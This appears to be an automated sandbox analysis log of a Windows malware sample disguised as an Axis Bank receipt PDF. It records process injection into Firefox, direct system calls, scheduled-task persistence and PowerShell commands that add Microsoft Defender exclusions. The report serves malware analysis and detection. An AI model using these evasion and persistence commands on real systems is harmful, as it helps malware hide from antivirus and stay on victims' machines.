Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtTerminateThread: Direct from: 0x77377B2E Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory written: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory written: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: NULL target: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: NULL target: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe protection: execute and read and write
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: NULL target: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe protection: execute and read and write
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\sc.exe Thread APC queued: target process: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\sc.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp566C.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp6A22.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe" Jump to behavior
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2098114142.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4520770682.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520497051.0000000001A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2098114142.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4520770682.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520497051.0000000001A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2098114142.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4520770682.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520497051.0000000001A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2098114142.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4520770682.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520497051.0000000001A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
